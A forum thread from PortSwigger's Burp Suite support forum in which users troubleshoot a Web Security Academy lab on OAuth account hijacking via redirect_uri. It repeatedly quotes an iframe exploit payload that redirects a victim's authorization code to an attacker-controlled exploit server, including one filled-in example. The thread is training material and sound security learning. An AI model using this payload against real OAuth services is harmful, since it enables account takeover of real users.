Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: OAuth account hijacking via redirect_uri

Prachi | Last updated: Jan 16, 2023 05:50PM UTC

<iframe src="https://YOUR-LAB-OAUTH-SERVER-ID.web-security-academy.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe> in this exploit, what is YOUR-LAB-OAUTH-SERVER-ID & YOUR-LAB-CLIENT-ID??

Ben, PortSwigger Agent | Last updated: Jan 16, 2023 06:00PM UTC

Hi Prachi, 'YOUR-LAB-CLIENT-ID' is the URL of your lab instance whereas 'YOUR-LAB-OAUTH-SERVER-ID' is the URL of the OAuth service being used in your lab instance (you should be able to find this by checking your HTTP history and this will start 'https://oauth-').

Prachi | Last updated: Jan 17, 2023 06:53AM UTC

i tried to put my lab instance as client id but i get below error when i load the iframe by clicking on view exploit- oops! something went wrong error: invalid_client error_description: client is invalid

Prachi | Last updated: Jan 17, 2023 07:19AM UTC

Figured it out - YOUR-LAB-OAUTH-SERVER :- starts with 'https://oauth-', found in host header of GET /auth request YOUR-LAB-CLIENT-ID :- GET /auth?client_id=[....] YOUR-LAB-ID :- lab instance ID YOUR-EXPLOIT-SERVER-ID :- exploit server ID

Liam, PortSwigger Agent | Last updated: Jan 17, 2023 06:53PM UTC

Thanks for letting us know, Prachi. Please let us know if you need any further assistance.

Wong | Last updated: May 25, 2023 01:18AM UTC

I got this error SessionNotFound: invalid_request at Provider.getInteraction (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11) at Provider.interactionDetails (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27) at /home/carlos/oauth/index.js:160:34 at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at setNoCache (/home/carlos/oauth/index.js:121:5) at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at Route.dispatch (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3) at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)

Ben, PortSwigger Agent | Last updated: May 25, 2023 08:01AM UTC

Hi, Are you able to provide us with details of what steps you have taken in this lab prior to seeing this error?

Wong | Last updated: May 29, 2023 02:22AM UTC

On step 6: Go back to the exploit server and create the following iframe at /exploit: <iframe src="https://oauth-YOUR-LAB-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

Wong | Last updated: May 29, 2023 02:23AM UTC

when i click view exploit, i got this error

Wong | Last updated: May 29, 2023 02:57AM UTC

Why i get the exploit code but all return 500 internal failure?

Ben, PortSwigger Agent | Last updated: May 30, 2023 10:47AM UTC

Hi, What values are you using within the iframe?

Wong | Last updated: Jun 01, 2023 08:04AM UTC

<iframe src="https://oauth-0a1400110305fcc180cd4256020a0083.oauth-server.net/auth?client_id=jhchozeafs9d9ej83rofi&redirect_uri=https://exploit-0a3900b803e5fc9e80a343d001050022.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

Ben, PortSwigger Agent | Last updated: Jun 02, 2023 07:20AM UTC